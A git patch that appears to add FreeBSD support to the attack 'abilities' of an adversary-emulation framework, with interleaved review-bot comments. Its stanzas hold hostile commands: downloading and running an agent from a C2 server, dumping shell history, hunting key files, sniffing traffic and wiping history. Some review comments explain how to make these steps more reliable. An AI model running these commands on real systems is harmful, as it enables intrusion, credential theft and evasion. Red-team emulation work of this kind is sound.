From 91bca397bea446b995c659d1a78763ee2de7f255 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alonso=20C=C3=A1rdenas?= Date: Sat, 29 Apr 2023 03:07:01 -0500 Subject: [PATCH 1/2] Add support for FreeBSD --- app/obfuscators/base64_basic.py | 1 + app/obfuscators/base64_jumble.py | 1 + app/obfuscators/base64_no_padding.py | 1 + app/obfuscators/caesar_cipher.py | 1 + app/obfuscators/steganography.py | 1 + .../02de522f-7e0a-4544-8afc-0c195f400f5f.yml | 2 +- .../10fad81e-3f68-47be-83b6-fbee7711c6a9.yml | 2 +- .../30a8cf10-73dc-497c-8261-a64cc9e91505.yml | 4 ++-- .../4e97e699-93d7-4040-b5a3-2e906a58199e.yml | 2 +- .../6469befa-748a-4b9c-a96d-f191fde47d89.yml | 2 +- .../720a3356-eee1-4015-9135-0fc08f7eb2d5.yml | 4 ++-- .../89955f55-529d-4d58-bed4-fed9e42515ec.yml | 2 +- .../90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml | 2 +- .../b007fe0c-c6b0-4fda-915c-255bbc070de2.yml | 2 +- .../0ab383be-b819-41bf-91b9-1bd4404d83bf.yml | 9 +++++++++ .../1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml | 5 +++++ .../422526ec-27e9-429a-995b-c686a29561a4.yml | 8 +++++++- .../de632c2d-a729-4b77-b781-6a6b09c148ba.yml | 4 ++-- .../36eecb80-ede3-442b-8774-956e906aff02.yml | 2 +- .../43b3754c-def4-4699-a673-1d85648fda6a.yml | 6 +++++- .../4cd4eb44-29a7-4259-91ae-e457b283a880.yml | 4 ++-- .../5f844ac9-5f24-4196-a70d-17f0bd44a934.yml | 4 ++-- .../30732a56-4a23-4307-9544-09caf2ed29d5.yml | 2 +- .../335cea7b-bec0-48c6-adfb-6066070f5f68.yml | 2 +- .../3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml | 2 +- .../3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml | 2 +- .../47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml | 11 +++++++++++ .../52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml | 2 +- .../5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml | 4 ++-- .../5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml | 4 ++-- .../5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml | 2 +- .../638fb6bb-ba39-4285-93d1-7e4775b033a8.yml | 4 ++++ .../6c91884e-11ec-422f-a6ed-e76774b0daac.yml | 2 +- .../6e1a53c0-7352-4899-be35-fa7f364d5722.yml | 2 +- .../830bb6ed-9594-4817-b1a1-c298c0f9f425.yml | 4 ++++ .../85341c8c-4ecb-4579-8f53-43e3e91d7617.yml | 4 ++-- 
.../9849d956-37ea-49f2-a8b5-f2ca080b315d.yml | 2 +- .../a41c2324-8c63-4b15-b3c5-84f920d1f226.yml | 2 +- .../b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml | 4 ++++ .../b6f545ef-f802-4537-b59d-2cb19831c8ed.yml | 4 ++-- .../bd527b63-9f9e-46e0-9816-b8434d2b8989.yml | 2 +- .../c0da588f-79f0-4263-8998-7496b1a40596.yml | 2 +- .../c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml | 2 +- .../ce485320-41a4-42e8-a510-f5a8fe96a644.yml | 2 +- .../e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml | 2 +- .../e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml | 6 +++++- .../fa6e8607-e0b1-425d-8924-9b894da5a002.yml | 2 +- .../b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml | 2 +- .../0582dc26-e0cf-4645-88cf-f37a02279976.yml | 2 +- .../110cea7a-5b03-4443-92ee-7ccefaead451.yml | 4 ++-- .../2f90d4de-2612-4468-9251-b220e3727452.yml | 2 +- .../300157e5-f4ad-4569-b533-9d1fa0e74d74.yml | 4 ++-- .../3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml | 4 ++-- .../4a1120a5-971c-457f-bb07-60641b4723fd.yml | 2 +- .../5c5b0392-1daa-45e1-967c-2f361ce78849.yml | 2 +- .../a201bec2-a193-4b58-bf0e-57fa621da474.yml | 4 ++-- .../ba0deadb-97ac-4a4c-aa81-21912fc90980.yml | 2 +- .../d754878c-17dd-46dc-891c-a993f8a10336.yml | 4 ++-- .../e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml | 4 ++-- .../ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml | 2 +- .../impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml | 13 +++++++++++++ .../impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml | 2 +- .../impact/55f9600a-756f-496b-b27f-682052dc429c.yml | 2 +- .../10a9d979-e342-418a-a9b0-002c483e0fa6.yml | 9 +++++++++ .../4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml | 8 ++++++++ .../10681f2f-be03-44af-858d-f2b0812df185.yml | 6 ++++++ 66 files changed, 158 insertions(+), 66 deletions(-) diff --git a/app/obfuscators/base64_basic.py b/app/obfuscators/base64_basic.py index 81d35abd..7fc2d626 100644 --- a/app/obfuscators/base64_basic.py +++ b/app/obfuscators/base64_basic.py @@ -10,6 +10,7 @@ def supported_platforms(self): return dict( windows=['psh'], darwin=['sh'], + freebsd=['sh'], linux=['sh'] ) 
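Review bot: The same `freebsd=['sh']` entry is added by hand to five near-identical `supported_platforms()` dicts — this hunk plus base64_jumble, base64_no_padding, caesar_cipher and steganography in the hunks that follow — so the next platform will need the same five edits again. If `BaseObfuscator` (not visible here) allows it, a class-level default platform map that each obfuscator extends or overrides would keep the list in one place; steganography's dict deliberately omits `windows`, so an override must remain possible. The key also has to match the platform string the agent reports for itself; this commit uses the literal `freebsd` elsewhere (`-H "platform:freebsd"`), so presumably that is the agent-side value, but it is worth confirming against the agent code. The method is shown in full, but the enclosing class starts outside the hunk.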
diff --git a/app/obfuscators/base64_jumble.py b/app/obfuscators/base64_jumble.py
index 46ada7af..406b2527 100644
--- a/app/obfuscators/base64_jumble.py
+++ b/app/obfuscators/base64_jumble.py
@@ -14,6 +14,7 @@ def supported_platforms(self):
 return dict(
 windows=['psh'],
 darwin=['sh'],
+ freebsd=['sh'],
 linux=['sh']
 )
diff --git a/app/obfuscators/base64_no_padding.py b/app/obfuscators/base64_no_padding.py
index a603b803..c5b03731 100644
--- a/app/obfuscators/base64_no_padding.py
+++ b/app/obfuscators/base64_no_padding.py
@@ -8,6 +8,7 @@ def supported_platforms(self):
 return dict(
 windows=['psh'],
 darwin=['sh'],
+ freebsd=['sh'],
 linux=['sh']
 )
diff --git a/app/obfuscators/caesar_cipher.py b/app/obfuscators/caesar_cipher.py
index 0a65c08a..5ac3fb14 100644
--- a/app/obfuscators/caesar_cipher.py
+++ b/app/obfuscators/caesar_cipher.py
@@ -10,6 +10,7 @@ def supported_platforms(self):
 return dict(
 windows=['psh'],
 darwin=['sh'],
+ freebsd=['sh'],
 linux=['sh']
 )
diff --git a/app/obfuscators/steganography.py b/app/obfuscators/steganography.py
index 23fdc93a..18364e27 100644
--- a/app/obfuscators/steganography.py
+++ b/app/obfuscators/steganography.py
@@ -14,6 +14,7 @@ class Obfuscation(BaseObfuscator):
 def supported_platforms(self):
 return dict(
 darwin=['sh'],
+ freebsd=['sh'],
 linux=['sh']
 )
diff --git a/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml b/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
index 69792ab0..9df3d9ef 100644
--- a/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
+++ b/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
@@ -15,7 +15,7 @@
 parsers:
 plugins.stockpile.app.parsers.ssh:
 - source: remote.ssh.cmd
- linux:
+ freebsd,linux:
 sh:
 command: |
 pip install -q stormssh 2> /dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g' 
diff --git a/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml b/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml index f3896625..0ad14a63 100644 --- a/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml +++ b/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml @@ -33,7 +33,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.dir.staged - linux: + freebsd,linux: sh: command: | chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}' diff --git a/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml b/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml index 5dc10231..a16e7e0a 100644 --- a/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml +++ b/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml @@ -8,7 +8,7 @@ attack_id: T1560.001 name: "Archive Collected Data: Archive via Utility" platforms: - linux: + freebsd,linux: sh: command: | tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg @@ -29,4 +29,4 @@ - source: host.dir.compress requirements: - plugins.stockpile.app.requirements.paw_provenance: - - source: host.dir.staged \ No newline at end of file + - source: host.dir.staged diff --git a/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml b/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml index 30a606fe..ee81ba05 100644 --- a/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml +++ b/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml @@ -12,7 +12,7 @@ sh: command: | cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} - linux: + freebsd,linux: sh: command: | cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} 
diff --git a/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml b/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml index e139e3a9..ffb7e936 100644 --- a/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml +++ b/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml @@ -17,7 +17,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.dir.staged - linux: + freebsd,linux: sh: command: | mkdir -p staged && echo $PWD/staged diff --git a/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml b/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml index 10493860..9dcdd03d 100644 --- a/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml +++ b/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml @@ -6,7 +6,7 @@ attack_id: T1005 name: Data from Local System platforms: - linux: + freebsd,linux: sh: command: | for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do @@ -21,4 +21,4 @@ Get-ChildItem C:\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter ".git" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0; parsers: plugins.stockpile.app.parsers.basic: - - source: host.dir.git \ No newline at end of file + - source: host.dir.git diff --git a/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml b/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml index 7a353b4f..dc364c3f 100644 --- a/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml +++ b/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml @@ -12,7 +12,7 @@ sh: command: | curl #{remote.host.socket} - linux: + freebsd,linux: sh: command: | curl #{remote.host.socket} diff --git a/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml b/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml index b10db4a3..e5f1e560 100644 
--- a/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml +++ b/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml @@ -27,7 +27,7 @@ - source: host.file.path edge: has_extension target: file.sensitive.extension - linux: + freebsd,linux: sh: command: | find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5 diff --git a/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml b/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml index e01109e2..831c6894 100644 --- a/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml +++ b/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml @@ -16,7 +16,7 @@ psh,pwsh: command: | Get-Clipboard -raw - linux: + freebsd,linux: sh: command: | xclip -o diff --git a/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml b/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml index 2a65bed3..a1956274 100644 --- a/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml +++ b/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml @@ -15,6 +15,15 @@ python ragdoll.py -W $server#{app.contact.html} cleanup: | pkill -f ragdoll + freebsd: + sh: + command: | + server="#{app.contact.http}"; + curl -s -X POST -H "file:ragdoll.py" -H "platform:freebsd" $server/file/download > ragdoll.py; + pip install requests beautifulsoup4; + python3.9 ragdoll.py -W $server#{app.contact.html} + cleanup: | + pkill -f ragdoll linux: sh: command: | diff --git a/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml b/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml index 8d4e2886..f4870f86 100644 --- a/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml +++ b/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml 
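Review bot: In the new `freebsd` stanza of 0ab383be the interpreter is pinned to `python3.9` while the dependency install uses a bare `pip`, so the two can resolve to different interpreters (or `pip` may be absent) and `ragdoll.py` then fails to import its dependencies; `python3.9 -m pip install requests beautifulsoup4;` keeps them aligned, and the same pinning appears in the `freebsd` stanza of 47abe1f5 (`python3.9 scanner.py ...`). A hard-coded minor version also stops working as soon as the host's Python package moves on; the other stanzas appear to use an unversioned `python`/`python3`, and FreeBSD's `lang/python3` meta-package provides the same `python3` name. `curl` is not in the FreeBSD base system either (it is the `ftp/curl` port, `fetch` is the base tool), so the download step silently fails on a minimal host. The linux stanza continues past the hunk.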
@@ -33,3 +33,8 @@ sh: command: | tcpdump -i en0 & sleep 5; kill $! + freebsd: + sh: + command: | + tcpdump -i em0 & sleep 5; kill $! + diff --git a/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml b/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml index 0592b563..8ac6af53 100644 --- a/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml +++ b/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml @@ -2,7 +2,7 @@ - id: 422526ec-27e9-429a-995b-c686a29561a4 name: Dump history - description: Get contents of bash history + description: Get contents of bash/csh history tactic: credential-access technique: attack_id: T1552.003 @@ -14,6 +14,12 @@ parsers: plugins.stockpile.app.parsers.ssh: - source: remote.ssh.cmd + freebsd: + sh: + command: cat ~/.history + parsers: + plugins.stockpile.app.parsers.ssh: + - source: remote.ssh.cmd linux: sh: command: cat ~/.bash_history diff --git a/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml b/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml index 336e309b..5bcc1cba 100644 --- a/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml +++ b/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml @@ -19,7 +19,7 @@ sh: command: | for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name "*${i}" 2>/dev/null;done; - linux: + freebsd,linux: sh: command: | - for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; \ No newline at end of file + for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; diff --git a/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml b/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml index 0f978da2..bf80d271 100644 
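Review bot: The new `freebsd` stanza in 1b4fb81c hard-codes `-i em0`, which only exists on hosts with an Intel `em(4)` NIC — FreeBSD interface names are driver-specific (`igb0`, `vtnet0`, `re0`, ...), so on other hardware `tcpdump` exits immediately and the ability reports success with empty output. Deriving the interface from the default route (`route -n get default` prints an `interface:` line) avoids the assumption; the darwin stanza's `en0` has the same limitation, but that is existing code. The hunk also appends a trailing blank `+` line at end of file, which looks unintended. The enclosing platform block starts above the hunk.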
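Review bot: The new `freebsd` stanza in 422526ec reads only `~/.history`, which is the csh/tcsh `savehist` file; users created with `adduser` get `sh` by default (and `bash` is a common port), and those users have no `~/.history`, so the ability returns nothing even though the description now promises `bash/csh history`. Reading the candidates together, `command: cat ~/.history ~/.bash_history 2>/dev/null`, covers both shells the description names in one stanza; the parser block can stay as it is. The linux stanza continues below the hunk.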
--- a/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml +++ b/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml @@ -11,7 +11,7 @@ darwin: sh: command: sleep 60 - linux: + freebsd,linux: sh: command: sleep 60 windows: diff --git a/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml b/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml index 0a5e1629..1b6dcc8d 100644 --- a/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml +++ b/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml @@ -12,10 +12,14 @@ sh: command: | > $HOME/.bash_history && unset HISTFILE + freebsd: + sh: + command: | + > $HOME/.history && set history = 0 linux: sh: command: | > $HOME/.bash_history && unset HISTFILE windows: psh: - command: Clear-History;Clear \ No newline at end of file + command: Clear-History;Clear diff --git a/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml b/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml index bf021d39..b7bad235 100644 --- a/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml +++ b/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml @@ -12,11 +12,11 @@ sh: cleanup: | rm #{payload} - linux: + freebsd,linux: sh: cleanup: | rm #{payload} windows: psh,pwsh: cleanup: | - Remove-Item -Force -Path "#{payload}" \ No newline at end of file + Remove-Item -Force -Path "#{payload}" diff --git a/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml b/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml index c7615901..4bf6ff61 100644 --- a/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml +++ b/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml 
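Review bot: `set history = 0` in the new `freebsd` stanza of 43b3754c is csh syntax, but the executor is `sh`, where `set history = 0` merely assigns the positional parameters `$1`..`$3` and has no effect on history; and because the command runs in a non-interactive subshell, the user's interactive shell settings are not touched in either case. Only the truncation does anything, so either shorten the line to `> $HOME/.history` or mirror the linux stanza with the sh-equivalent `unset HISTFILE`, and note that `~/.history` is the csh/tcsh file, so sh/bash users are not covered here. The windows stanza's `\ No newline` fix is fine.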
@@ -25,9 +25,9 @@ path="$(pwd)/#{exe_name}"; num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l); if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; - linux: + freebsd,linux: sh: command: | path="$(pwd)/#{exe_name}"; num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l); - if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; \ No newline at end of file + if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; diff --git a/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml b/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml index 189852a8..ba2d5cb0 100644 --- a/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml +++ b/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml @@ -12,7 +12,7 @@ sh: command: | find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \; - linux: + freebsd,linux: sh: command: | find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \; diff --git a/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml b/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml index a5e12f8e..11866775 100644 --- a/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml +++ b/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml @@ -12,7 +12,7 @@ sh: command: | ps - linux: + freebsd,linux: sh: command: | ps diff --git a/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml b/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml index a46c3eef..95fc87cf 100644 --- a/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml +++ b/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml 
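Review bot: Adding `freebsd` to the merged stanza of 5f844ac9 makes the cleanup depend on `lsof`, which is a port (`sysutils/lsof`) rather than part of the FreeBSD base system; where it is missing, `lsof -p $id 2> /dev/null` prints nothing, `num_processes` is 0 and the payload is removed even while another process still has it open — the opposite of what the guard intends. `procstat -f $id` (base system) lists a process's open files with paths and could stand in for `lsof -p $id`, but its columns differ, so the `grep "$path"` would need checking and a separate `freebsd` stanza may be cleaner than the shared key. The enclosing darwin stanza starts above the hunk.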
@@ -12,7 +12,7 @@ sh: command: | nmap -sV -p #{remote.host.port} #{remote.host.ip} - linux: + freebsd,linux: sh: command: | nmap -sV -p #{remote.host.port} #{remote.host.ip} diff --git a/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml b/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml index fa4d6878..3e5a84ed 100644 --- a/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml +++ b/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml @@ -12,7 +12,7 @@ sh: command: | ps aux | grep #{host.user.name} - linux: + freebsd,linux: sh: command: | ps aux | grep #{host.user.name} diff --git a/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml b/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml index 9428b9de..dc7aacf5 100644 --- a/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml +++ b/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml @@ -17,6 +17,17 @@ target: remote.host.port payloads: - scanner.py + freebsd: + sh: + command: | + python3.9 scanner.py -i #{remote.host.ip} + parsers: + plugins.stockpile.app.parsers.scan: + - source: remote.host.ip + edge: has_open_port + target: remote.host.port + payloads: + - scanner.py linux: sh: command: | diff --git a/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml b/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml index 6b5020fd..4c5ac18b 100644 --- a/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml +++ b/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml @@ -12,7 +12,7 @@ sh: command: | ls - linux: + freebsd,linux: sh: command: | ls diff --git a/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml b/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml index e896815e..6f528d24 100644 --- a/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml +++ b/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml 
@@ -42,6 +42,6 @@ darwin: sh: command: ps aux - linux: + freebsd,linux: sh: - command: ps aux \ No newline at end of file + command: ps aux diff --git a/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml b/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml index 47005640..785bed27 100644 --- a/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml +++ b/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml @@ -15,6 +15,6 @@ darwin: sh: command: groups - linux: + freebsd,linux: sh: - command: groups \ No newline at end of file + command: groups diff --git a/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml b/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml index 46042331..05929f6c 100644 --- a/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml +++ b/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml @@ -12,7 +12,7 @@ sh: command: | cat ~/.ssh/known_hosts - linux: + freebsd,linux: sh: command: | cat ~/.ssh/known_hosts diff --git a/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml b/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml index 13a57b7c..ae2eced0 100644 --- a/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml +++ b/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml @@ -11,6 +11,10 @@ sh: command: | netstat -anto + freebsd: + sh: + command: | + netstat -aSp tcp linux: sh: command: | diff --git a/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml b/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml index 716c9161..cded4004 100644 --- a/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml +++ b/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml @@ -14,7 +14,7 @@ - source: host.print.file edge: has_size target: host.print.size - linux: + freebsd,linux: sh: command: lpq -a parsers: 
diff --git a/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml b/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml index 333ca185..70174b63 100644 --- a/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml +++ b/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml @@ -12,7 +12,7 @@ sh: command: | pwd - linux: + freebsd,linux: sh: command: | pwd diff --git a/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml b/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml index 3511bbe3..464f121d 100644 --- a/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml +++ b/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml @@ -12,6 +12,10 @@ sh: command: | which google-chrome + freebsd: + sh: + command: | + which chrome linux: sh: command: | diff --git a/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml b/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml index 382a9c25..d958362c 100644 --- a/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml +++ b/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml @@ -14,7 +14,7 @@ parsers: plugins.stockpile.app.parsers.ipaddr: - source: remote.host.ip - linux: + freebsd,linux: sh: command: arp -a parsers: @@ -25,4 +25,4 @@ command: arp -a parsers: plugins.stockpile.app.parsers.ipaddr: - - source: remote.host.ip \ No newline at end of file + - source: remote.host.ip diff --git a/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml b/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml index b1d19484..20bf28d7 100644 --- a/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml +++ b/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml @@ -12,7 +12,7 @@ sh: command: | which go - linux: + freebsd,linux: sh: command: | which go 
